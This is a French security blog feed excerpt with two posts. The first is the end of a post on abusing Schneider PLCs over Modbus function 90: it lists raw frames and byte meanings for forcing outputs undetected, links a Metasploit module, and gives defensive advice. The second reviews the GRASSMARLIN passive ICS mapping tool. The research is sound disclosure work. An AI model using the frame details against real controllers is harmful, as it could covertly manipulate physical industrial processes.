<figure id="post-15832 media-15832" class="align-none"><img loading="lazy" decoding="async" class="size-full wp-image-15832 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/9.png" alt="" width="640" height="418" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/9.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/9-292x191.png 292w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/05/9-60x39.png 60w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
</div>
</div>
<div style="text-align: justify;">
<div style="text-align: center;"><i>Forçage de valeurs à 1 dans Unity Pro</i></div>
<p>&nbsp;</p>
</div>
<div style="text-align: justify;"></div>
<div style="text-align: justify;">Via l’analyse des trames réseau échangées lors du forçage de valeurs, il a été possible de comprendre partiellement le protocole. Ci-dessous, on présente une comparaison des trames pour forcer la sortie <b>%Q0.17</b> à 1, et forcer la sortie <b>%Q0.18</b> à 0 :</div>
<div style="text-align: justify;"></div>
<div style="background-color: #dfd2ee; border: 1px solid black; padding-left: 1%; padding-right: 1%; width: 100%;">
<pre>[…]\x04\x00\x00\x00\x01\x00\x01\x20\x02\x01\x00\x11\x00\x01\x00\x00\x00\x03
[…]\x04\x00\x00\x00\x01\x00\x01\x20\x02\x01\x00\x12\x00\x01\x00\x00\x00\x02</pre>
</div>
<div style="text-align: justify;">Un octet permet de déterminer la sortie à forcer :</div>
<div style="text-align: justify;">
<ul>
<li>0x11 pour la sortie %Q0.17</li>
<li>0x12 pour la sortie %Q0.18</li>
</ul>
</div>
<p>La valeur de forçage est déterminée par le dernier octet :</p>
<ul>
<li>0x03 pour 0</li>
<li>0x02 pour 1</li>
<li>0x04 pour annuler le forçage</li>
</ul>
<div style="text-align: justify;"></div>
<div style="text-align: justify;"><span style="font-family: inherit;">Dans la vidéo ci-dessous, on démontre le fonctionnement du module Metasploit en alternant les valeurs de forçage des sorties 17 à 23 : <a href="https://www.youtube.com/watch?time_continue=2&amp;v=D1p2ni0eGhc">https://www.youtube.com/watch?time_continue=2&amp;v=D1p2ni0eGhc</a></span></div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<h3><span style="font-family: inherit;">Pourquoi cette fonction est-elle intéressante du point de vue d’un attaquant ?</span></h3>
</div>
<div style="text-align: justify;"><span style="font-family: inherit;">Dans un SI industriel en fonctionnement, les opérateurs ne surveillent pas le procédé avec Unity pro, mais un logiciel de supervision de type SCADA ou DCS, qui va leur permettre d’avoir une vue d’ensemble du précédé et de pouvoir interagir avec les différents composants. Ce logiciel va donc interroger, à intervalle régulier, les automates pour afficher les valeurs correspondantes à l’opérateur.</span></div>
<div style="text-align: justify;"><span style="font-family: inherit;">Cependant, dans la majorité des cas, ces logiciels ne vont pas directement afficher la valeur des sorties des automates ; des variables intermédiaires ou calculées sont utilisées. Ainsi, un attaquant capable de forcer la valeur des sorties de l’automate va pouvoir influencer le procédé physique, sans pour autant que cela soit visible du point de vue de l’opérateur en train de superviser le procédé.</span></div>
<div style="text-align: justify;"><span style="font-family: inherit;">Une démonstration live a été faite lors de la DEFCON. On peut observer que la valeur du feu rouge sur le logiciel de supervision IGSS reste fixe, tandis qu’en manipulant directement les variables de sortie on peut influencer sur la couleur du feu physique : <a href="https://www.youtube.com/watch?v=A_B69Rifu1g">https://www.youtube.com/watch?v=A_B69Rifu1g</a></span></div>
<div style="text-align: justify;"><span style="font-family: inherit;"> </span></div>
<div style="text-align: justify;"><span style="font-family: inherit;">Le module Metasploit n&rsquo;étant pas totalement finalisé, il n&rsquo;a pas fait l&rsquo;objet d&rsquo;une pull request vers le dépôt officiel. Vous pouvez néanmoins le trouver ici : <a href="https://github.com/wavestone-cdt/ics-tools">https://github.com/wavestone-cdt/ics-tools</a>.</span></div>
<p>&nbsp;</p>
<h2 style="text-align: justify;"><span style="font-family: inherit;">Conclusion et sécurisation</span></h2>
<div style="text-align: justify;"><span style="font-family: inherit;">Ces travaux ont été principalement réalisés sur des automates Schneider Premium et M340. Ils sont partiellement portables sur les nouvelles générations (par exemple M221) avec quelques ajustements. En effet, une capture réseau lors de la programmation d’un automate M221 montrera que c’est bien la fonction Modbus 90 qui est utilisée pour la programmation, mais de manière légèrement différente. Elle peut également être utilisé pour la mise en mode START ou STOP, ainsi que pour le forçage des valeurs de sortie.</span></div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<h3><span style="font-family: inherit;">Qu’en est-il ailleurs ?</span></h3>
</div>
<div style="text-align: justify;"><span style="font-family: inherit;">L’utilisation de protocoles de communication non-sécurisés pour la programmation et la maintenance des automates programmables industriels est encore une réalité en cette fin d’année 2017. L’exemple ici présenté ne vise pas à cibler la marque Schneider en particulier. La grande majorité des constructeurs d’automates utilisent des protocoles non authentifiés pour la programmation. On pourrait notamment citer le cas de la majorité des automates reposant sur la bibliothèque CodeSys, comme démontré (là aussi) par Reid Wightman : <a href="http://www.digitalbond.com/blog/2012/10/25/new-project-basecamp-tools-for-codesys-200-vendors-affected/">http://www.digitalbond.com/blog/2012/10/25/new-project-basecamp-tools-for-codesys-200-vendors-affected/</a>.</span></div>
<p>&nbsp;</p>
<div style="text-align: justify;">
<h3><span style="font-family: inherit;">Que faire ?</span></h3>
</div>
<div style="text-align: justify;"><span style="font-family: inherit;">La sécurisation d’un SI industriel doit donc prendre en compte le fait qu’un accès réseau sur le port TCP 502 permet d’accéder à la logique de l’automate, de la modifier mais également de forcer certaines valeurs, ce qui permet à un attaquant de mener une attaque qui ne sera pas visible de l’opérateur.</span></div>
<div style="text-align: justify;"><span style="font-family: inherit;">Les dernières versions d’automates, notamment dans les gammes les plus chères, incluent désormais des fonctions de sécurisation. L’approche la plus fréquente est d’encapsuler les protocoles non-sécurisés dans un tunnel authentifié et chiffré, avec TLS (Siemens) ou IPSEC (Schneider). Il conviendra cependant d’évaluer le bon niveau de sécurité de ces nouvelles fonctionnalités.</span></div>
<div style="text-align: justify;"><span style="font-family: inherit;">Il faut donc commencer par appliquer les bonnes pratiques de cloisonnement réseau, et superviser les actions d’administration. On peut par exemple mettre en place une sonde de type IDS avec une signature dédiée à la fonction 90 de Modbus.</span></div>
<div style="text-align: justify;"><span style="font-family: inherit;">Enfin, un axe d’amélioration axé métier serait la mise en place de mécanismes de contrôle d’intégrité au niveau des automates et du SCADA, permettant de s’assurer que les variables utilisées reflètent la réalité du procédé physique. On pourrait ainsi imaginer l&rsquo;insertion, dans la logique de l&rsquo;automate, quelques fonctions visant à assurer la détection d&rsquo;une incohérence entre une valeur intermédiaire et une valeur de sortie. De la même manière, il serait intéressant pour le logiciel SCADA de pouvoir notifier l&rsquo;opérateur lorsque des valeurs sont forcées, mais cette capacité n&rsquo;est, à notre connaissance, pas proposée par les automates étudiés.</span></div>
<div style="text-align: justify;"><span style="font-family: inherit;"><br />
</span></p>
<div style="text-align: right;"><b>Arnaud SOULLIE</b></div>
</div>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2018/02/fun-with-modbus-0x5a/">Fun with Modbus 0x5A</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Test de Grassmarlin, outil open-source de cartographie passive pour SI industriels</title>
		<link>https://www.riskinsight-wavestone.com/2016/03/test-de-grassmarlin-outil-open-source/</link>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Mon, 07 Mar 2016 09:00:41 +0000</pubDate>
				<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[open-source]]></category>
		<category><![CDATA[outil]]></category>
		<category><![CDATA[SI industriel]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=15683</guid>

					<description><![CDATA[<p>La première étape dans un projet de sécurisation de son SI industriel est bien souvent la création, ou la fiabilisation, d’un inventaire de l’ensemble des composants. En effet, l’inventaire et la documentation existante peuvent s’avérer insuffisant ou non-fiable. C’est à...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2016/03/test-de-grassmarlin-outil-open-source/">Test de Grassmarlin, outil open-source de cartographie passive pour SI industriels</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="separator" style="clear: both; text-align: center;">
<figure id="post-15684 media-15684" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15684 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I1-1.png" alt="" width="640" height="332" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I1-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I1-1-368x191.png 368w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I1-1-71x37.png 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
</div>
<p><i>La première étape dans un projet de sécurisation de son SI industriel est bien souvent la création, ou la fiabilisation, d’un inventaire de l’ensemble des composants. En effet, l’inventaire et la documentation existante peuvent s’avérer insuffisant ou non-fiable.</i><br />
<i>C’est à ce besoin que répond l’outil GRASSMARLIN en fournissant une solution de cartographie réseau passive adaptée au secteur industriel.</i></p>
<p>&nbsp;</p>
<h1>Présentation de GRASSMARLIN</h1>
<p>GRASSMARLIN est un outil permettant de cartographier de manière passive un réseau industriel. Cet outil, premièrement développé par la National Security Agency (NSA) des États-Unis est désormais Open-Source et directement accessible sur GitHub (<a href="https://github.com/iadgov/GRASSMARLIN">https://github.com/iadgov/GRASSMARLIN</a>).<br />
L’outil GRASSMARLIN permet d’obtenir une image ou « snapshot » du système d’information (SI) industriel avec notamment:</p>
<ul>
<li>Les équipements présents</li>
<li>Les communications existantes entre les équipements</li>
<li>Des méta-informations obtenues à partir des communications (localisation, constructeurs)</li>
</ul>
<p>L’outil est disponible sur la plateforme Windows (version 7+, 64bits uniquement), certaines distributions Linux (Fedora, Ubuntu) et est téléchargeable au lien suivant : <a href="https://github.com/iadgov/GRASSMARLIN/releases/latest">https://github.com/iadgov/GRASSMARLIN/releases/latest</a>.</p>
<p>Une perte de disponibilité d’un équipement du SI industriel pouvant avoir des conséquences importantes (arrêt de la production, perte de visibilité pour les opérateurs, …), la cartographie est entièrement passive. Les communications sont enregistrées puis analysées, contrairement à un scan actif avec nmap ou plcscan qui vont activement envoyer des paquets à destination de toutes les adresses IP et analyser les éventuels retours.</p>
<h1>Fonctionnement de Grassmarlin</h1>
<p>GRASSMARLIN permet d’obtenir deux types de topologies du réseau industriel :</p>
<ul>
<li>La « Logical View » : fournit une liste des équipements présents et des communications existantes, nommée par la suite la vue logique.</li>
<li>La « Physical View » : permet d’obtenir les liens physiques entre les équipements en donnant par exemple le numéro de port d’un routeur auquel un automate est connecté, nommée par la suite la vue physique.</li>
</ul>
<h2>La détection passive</h2>
<p>La méthode de découverte de réseau étant passive l’outil GRASSMARLIN ne génère aucun trafic sur le réseau. Ainsi afin d’obtenir des résultats de la vue logique ce dernier va simplement écouter les communications sur le réseau tel un analyseur de trame classique. En d’autres termes, GRASSMARLIN ne pourra analyser que les communications qu’il est en mesure d’écouter sur sa machine hôte.</p>
<figure id="post-15686 media-15686" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15686 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I2-1.png" alt="" width="640" height="450" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I2-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I2-1-272x191.png 272w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I2-1-55x39.png 55w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
<div class="separator" style="clear: both; text-align: center;"></div>
<div style="text-align: center;"><i><u>Figure 1 : Visibilité de GRASSMARLIN</u></i></div>
<div style="text-align: center;"></div>
<p>Il est aussi possible d’obtenir une topologie réseau à partir de captures réseaux (fichiers PCAP) générées à des instants ultérieurs à d’autres points du réseau.<br />
De même, pour générer la vue physique GRASSMARLIN utilise des logs de routeur Cisco et reste donc totalement passif.</p>
<h3>Vue logique</h3>
<p>Dans cette vue, la topologie du réseau se présente comme suit :</p>
<figure id="post-15688 media-15688" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15688 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I3-2.png" alt="" width="400" height="336" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I3-2.png 400w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I3-2-227x191.png 227w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I3-2-46x39.png 46w" sizes="auto, (max-width: 400px) 100vw, 400px" /></figure>
<div style="text-align: center;"><i><u>Figure 2 : Vue logique avec 2 automates Siemens</u></i></div>
<div style="text-align: center;"><i><u> </u></i></div>
<div style="text-align: left;">Cette topologie est générée à partir d’une capture réseau de deux équipements industriels utilisant le protocole de communication industriel S7comm. Les fichiers PCAP peuvent être  retrouvés à cette adresse : <a href="https://wiki.wireshark.org/S7comm">https://wiki.wireshark.org/S7comm</a></div>
<p>La carte principale à droite permet de donner les équipements présents, identifiés par leur adresse IP, ainsi que les communications existantes entre les équipements et les sous-réseaux IP.<br />
Par ailleurs, GRASSMARLIN reconnait à l’aide de signatures les protocoles et équipements industriels :</p>
<figure id="post-15690 media-15690" class="align-none"></figure>
<div class="separator" style="clear: both; text-align: center;"></div>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-15692 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I5-1.png" alt="" width="640" height="209" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I5-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I5-1-437x143.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I5-1-71x23.png 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></p>
<div style="text-align: center;"><i><u>Figure 3 : Vue logique et détails fournis par GRASSMARLIN</u></i></div>
<div style="text-align: center;"></div>
<p>Dans le cas présent, le protocole utilisé est bien reconnu comme S7comm. Le rôle des équipements dans les communications est aussi informé : le master (ou maître) donne les consignes lorsque le slave (ou esclave) exécute les commandes. Le Vendor Name (nom du constructeur) est donné et permet aux gestionnaires de parcs industriels de pouvoir se repérer plus aisément. Enfin, dans le cas où les adresses IP sont publiques (ce qui n’est pas le cas ici) le pays d’origine de l’équipement est informé.<br />
Ces informations sont générées suite à la confrontation des captures réseaux avec les signatures connues par GRASSMARLIN, l’attribut Confidence (confiance) échelonné de 1 (non confiant) à 5 (confiant) informe alors sur le degré de véracité des informations données.<br />
GRASSMARLIN fournit aussi une vision textuelle de la carte à l’aide d’un arbre de connections (présent à gauche sur la figure 2) renseignant les équipements par sous-réseaux.<br />
Il est aussi possible d’isoler les communications liées à un équipement en particulier et d’obtenir des premiers éléments d’analyses tels que : la taille des paquets échangés, l’instant t de l’échange, l’origine du paquet (si plusieurs fichiers PCAP’s sont utilisés) :</p>
<div class="separator" style="clear: both; text-align: center;"></div>
<div class="separator" style="clear: both; text-align: center;"></div>
<div style="text-align: center;"><img loading="lazy" decoding="async" class="aligncenter wp-image-15694 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I6-1.png" alt="" width="320" height="198" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I6-1.png 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I6-1-309x191.png 309w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I6-1-63x39.png 63w" sizes="auto, (max-width: 320px) 100vw, 320px" /></div>
<div style="text-align: center;"><i><u>Figure 4 : Fenêtre d’analyse des communications d’un automate</u></i></div>
<div style="text-align: center;"></div>
<h3>Signatures protocolaires</h3>
<p>GRASSMARLIN embarque des signatures permettant de reconnaitre les protocoles utilisés sur la vue logique.<br />
Chaque signature peut être composée de deux types d’élément :</p>
<ul>
<li>L’élément Filter (ou filtre) qui décrit un attribut à détecter.</li>
<li>L’élément Payload (ou charge utile) qui permet de retourner des informations à l’utilisateur.</li>
</ul>
<p>Une signature peut contenir plusieurs Filter et chaque Payload fait référence à un Filter :</p>
<div class="separator" style="clear: both; text-align: center;"></div>
<p>&nbsp;</p>
<div style="text-align: center;">
<figure id="post-15696 media-15696" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15696 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I7-1.png" alt="" width="320" height="289" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I7-1.png 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I7-1-211x191.png 211w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I7-1-43x39.png 43w" sizes="auto, (max-width: 320px) 100vw, 320px" /></figure>
<p><i><u>Figure 5 : Exemple de signature MODBUS</u></i></p>
</div>
<div style="text-align: center;"></div>
<p>Les Filter permettent essentiellement de décrire des attributs protocolaires des couches 2 à 4 du modèle OSI. Voici une liste des Filter actuellement disponibles :</p>
<figure id="post-15698 media-15698" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15698 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I8.png" alt="" width="400" height="179" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I8.png 400w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I8-71x32.png 71w" sizes="auto, (max-width: 400px) 100vw, 400px" /></figure>
<div style="text-align: center;"><i><u>Tableau 1 : Ensemble des filtres possibles</u></i></div>
<div style="text-align: center;"></div>
<p>Les Payload quant à eux permettent de rajouter une description à un élément réseau, d’extraire des valeurs d’un paquet ou encore d’afficher une information en fonction de la présence d’un motif dans un paquet.<br />
La version actuelle de GRASSMARLIN (v3) compte 54 signatures couvrant les protocoles industriels couramment utilisés. Du fait du récent passage de l’outil en open-source (28/01/16) il est probable que la bibliothèque de signature s’enrichisse avec les années à venir.<br />
Les signatures sont éditées sous le format XML néanmoins un outil graphique est proposé – FingerPrint Editor &#8211; afin de permettre une création plus aisée de signatures :</p>
<figure id="post-15700 media-15700" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15700 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I9-1.png" alt="" width="400" height="308" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I9-1.png 400w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I9-1-248x191.png 248w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I9-1-51x39.png 51w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I9-1-156x121.png 156w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I9-1-155x120.png 155w" sizes="auto, (max-width: 400px) 100vw, 400px" /></figure>
<div style="text-align: center;"><i><u>Figure 6 : Fingerprint Editor, outil graphique d’édition de signatures</u></i></div>
<div style="text-align: center;"></div>
<h3>Vue physique</h3>
<p>La topologie physique permet d’obtenir les connexions physiques existantes entre les équipements.</p>
<figure id="post-15702 media-15702" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15702 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I10-1.png" alt="" width="640" height="330" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I10-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I10-1-370x191.png 370w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I10-1-71x37.png 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
<div style="text-align: center;"><i><u>Figure 7 : Vue physique</u></i></div>
<div style="text-align: center;"></div>
<p>Ces vues, plus orientées connectivité réseau, permettent d’obtenir les liaisons physiques existantes entre les équipements industriels et leurs connexions aux équipements réseaux.<br />
À ce jour seul les routeurs Cisco sont supportés et les vues sont générées à partir des résultats des 3 commandes suivantes :</p>
<ul>
<li>“show running-config”</li>
<li>“show ip arp” (OU) “show mac address-table”</li>
<li>“show interfaces”</li>
</ul>
<p>Une fois la sortie de ces commandes enregistrée dans un fichier texte, GRASSMARLIN est en mesure de générer à partir de ce dernier la vue physique.</p>
<h3>Partage de données</h3>
<p>L’exportation des données est gérée par GRASSMARLIN avec 3 types d’export</p>
<ul>
<li>L’exportation des vues sous format d’images (PNG).</li>
<li>L’exportation des données sous format XML :
<ul>
<li>Enregistre l’ensemble de l’arbre de connexion de la vue logique.</li>
<li>Ces données peuvent être utilisées comme des données de session lors de prochaine importation.</li>
</ul>
</li>
<li>L’exportation des données en partage : création d’une archive avec les données sous format XML et les fichiers de captures réseaux générés.</li>
</ul>
<h2>Tests sur banc d’essai</h2>
<p>Des tests sur une des maquettes SI industriel de Solucom ont été réalisés afin de confronter l’outil à un cas d’utilisation concret avec de réels équipements industriels.</p>
<h3>Présentation banc d’essai</h3>
<p>Le banc d’essai simule un aiguillage de train et est composé de :</p>
<ul>
<li>1 interface homme/machine (IHM) Siemens ;</li>
<li>1 automate Siemens ;</li>
<li>2 automates Schneider ;</li>
<li>1 switch manageable.</li>
</ul>
<figure id="post-15704 media-15704" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15704 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I11.jpg" alt="" width="320" height="239" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I11.jpg 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I11-256x191.jpg 256w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I11-52x39.jpg 52w" sizes="auto, (max-width: 320px) 100vw, 320px" /></figure>
<div style="text-align: center;"><i><u>Figure 8 : Photo du banc d’essai</u></i></div>
<div style="text-align: center;"></div>
<p>Un poste de travail disposant de Grassmarlin est directement connecté à un port en mirroring sur le switch et accède donc à l’ensemble des communications de la maquette. Par ailleurs, aucun équipement Cisco n’étant présent sur la maquette seule la vue logique a été testée.</p>
<h3>Réalisation des tests</h3>
<p>Suite à une capture en temps réel des trames, GRASSMARLIN a pu générer la vue logique suivante :</p>
<figure id="post-15706 media-15706" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15706 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I12-1.png" alt="" width="320" height="281" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I12-1.png 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I12-1-218x191.png 218w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I12-1-44x39.png 44w" sizes="auto, (max-width: 320px) 100vw, 320px" /></figure>
<div class="separator" style="clear: both; text-align: center;"></div>
<div style="text-align: center;"><i><u>Figure 9 : Vue logique de la maquette</u></i></div>
<div style="text-align: center;"></div>
<div style="text-align: left;">Et, après réorganisation (manuelle) de la vue nous obtenons la vue suivante :</div>
<p>&nbsp;</p>
<figure id="post-15708 media-15708" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15708 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I13-1.png" alt="" width="320" height="169" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I13-1.png 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I13-1-71x37.png 71w" sizes="auto, (max-width: 320px) 100vw, 320px" /></figure>
<div style="text-align: center;"><i><u>Figure 10 : Vue logique de la maquette réordonnée</u></i></div>
<div style="text-align: center;"></div>
<p>Le temps d’apparition des équipements sur la carte est quasi-instantané dès réception des flux. GRASSMARLIN identifie bien l’ensemble des équipements présents tout en donnant les protocoles de communications utilisés.<br />
De même, un fichier XML de sortie est correctement généré à partir des fonctions d’export. Ce dernier résume l’ensemble des informations extraites par GRASSMARLIN et permet de réutiliser les données plus facilement :</p>
<p>&nbsp;</p>
<figure id="post-15710 media-15710" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15710 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I14-1.png" alt="" width="640" height="406" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I14-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I14-1-301x191.png 301w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I14-1-61x39.png 61w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
<div style="text-align: center;"><i><u>Figure 11 : Fichier de sortie XML</u></i></div>
<div style="text-align: center;"></div>
<p>Cependant, certaines limitations ont pu être observées :</p>
<ul>
<li>La non-concurrence des signatures<br />
Si un équipement répond à plusieurs signatures alors seule une signature est détectée. Ceci peut notamment poser problème dans le cas d’une IHM qui communique potentiellement avec différents automates en utilisant plusieurs protocoles de communication.</li>
<li>Le manque de verbosité de certaines signatures<br />
Les signatures comportent des champs descriptions dans leur Payload permettant de décrire au mieux le rôle de l’équipement identifié. Il est possible que ces champs soient laissés initialement vides ou peu renseignés ce qui peut compliquer la tâche d’identification.</li>
<li>Une analyse des échanges peu aboutie<br />
GRASSMARLIN ne fournit actuellement que les premiers éléments d’analyse sur les communications : tailles des paquets, instants d’envois. Dans les pistes d’améliorations de sa fonction d’analyse nous pourrions par exemple citer l’implémentation d’une fonction de reconnaissance de cycles dans les échanges entre IHM et automates.</li>
</ul>
<h2>Conclusion</h2>
<p>D’autres outils de détection passive de topologie sont disponibles sur le marché. Cependant GRASSMARLIN est actuellement l’un des rares, si ce n’est l’unique, à être destiné au SI industriels et à être Open-Source.<br />
En comparaison un autre outil nommé <a href="http://www.netresec.com/?page=NetworkMiner" target="_blank" rel="noopener">NetworkMiner</a> permet aussi de réaliser des topologies de réseaux en utilisant les signatures d’autres outils dont notamment : <a href="https://nmap.org/" target="_blank" rel="noopener">nmap</a>, <a href="http://lcamtuf.coredump.cx/p0f3/" target="_blank" rel="noopener">p0f</a> et <a href="https://ettercap.github.io/ettercap/" target="_blank" rel="noopener">Ettercap</a> . Néanmoins, ce dernier n’embarque pas à l’installation de signatures destinées aux protocoles industriels et n’est donc pas aussi précis que GRASSMARLIN.</p>
<figure id="post-15712 media-15712" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15712 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I15-1.png" alt="" width="320" height="268" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I15-1.png 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I15-1-228x191.png 228w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I15-1-47x39.png 47w" sizes="auto, (max-width: 320px) 100vw, 320px" /></figure>
<div style="text-align: center;"><i><u>Figure 12 : Sortie de l’outil NetworkMiner pour 2 automates Siemens</u></i></div>
<div style="text-align: center;"></div>
<p>&nbsp;</p>
<figure id="post-15714 media-15714" class="align-none"><img loading="lazy" decoding="async" class="wp-image-15714 size-full aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I16-1.png" alt="" width="320" height="287" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I16-1.png 320w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I16-1-213x191.png 213w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I16-1-43x39.png 43w" sizes="auto, (max-width: 320px) 100vw, 320px" /></figure>
<div style="text-align: center;"><i><u>Figure 13 : Autre exemple – utilisation de l’outil p0f avec 2 automates Siemens</u></i></div>
<div style="text-align: center;"></div>
<div></div>
<figure id="post-15716 media-15716" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15716 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I17-1.png" alt="" width="640" height="209" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I17-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I17-1-437x143.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I17-1-71x23.png 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
<div style="text-align: center;"><i><u>Figure 14 : Sortie de GRASSMARLIN avec 2 automates Siemens</u></i></div>
<div style="text-align: center;"></div>
<p>Citons également la solution commerciale de Sentryo, dédiée elle aux SI industriels. Cette solution ne se contente pas de créer une cartographie à l’instant t, mais permet également d’alerter sur toutes variations par rapports aux communications habituelles, et ainsi de détecter des événements de sécurité. Lors de la démonstration à laquelle nous avons assistée, le niveau de détail fourni sur les automates (Schneider et Siemens à minima) était bien supérieur à celui qu’on peut actuellement obtenir avec Grassmarlin (marque, modèle, composants de l’automate et version du firmware par exemple).</p>
<figure id="post-15718 media-15718" class="align-none"><img loading="lazy" decoding="async" class="aligncenter wp-image-15718 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I18-1.png" alt="" width="640" height="240" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I18-1.png 640w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I18-1-437x164.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2021/04/I18-1-71x27.png 71w" sizes="auto, (max-width: 640px) 100vw, 640px" /></figure>
<div class="separator" style="clear: both; text-align: center;"></div>
<div style="text-align: center;"><i><u>Figure 15 : Extrait d’une cartographie générée par Sentryo (<a href="https://www.sentryo.net/how-to-start-your-ics-cybersecurity-project/">https://www.sentryo.net/how-to-start-your-ics-cybersecurity-project/</a>)</u></i></div>
